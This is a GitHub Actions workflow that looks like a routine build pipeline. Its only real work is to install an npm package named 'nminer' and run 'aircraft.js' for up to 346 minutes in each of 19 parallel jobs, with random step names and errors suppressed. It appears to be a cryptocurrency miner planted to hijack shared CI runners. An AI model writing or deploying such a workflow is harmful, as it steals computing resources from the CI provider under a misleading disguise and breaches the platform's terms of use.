name: aircraft
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 134 }
          - { version: 3350 }
          - { version: 8574 }
          - { version: 3624 }
          - { version: 7765 }
          - { version: 8099 }
          - { version: 6126 }
          - { version: 5023 }
          - { version: 8451 }
          - { version: 1470 }
          - { version: 3103 }
          - { version: 6895 }
          - { version: 8915 }
          - { version: 9234 }
          - { version: 341 }
          - { version: 4064 }
          - { version: 1130 }
          - { version: 5170 }
          - { version: 7193 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: censor window lone
        run: |
          npm install nminer@latest
          timeout 346m node aircraft.js || echo "aircraft executed"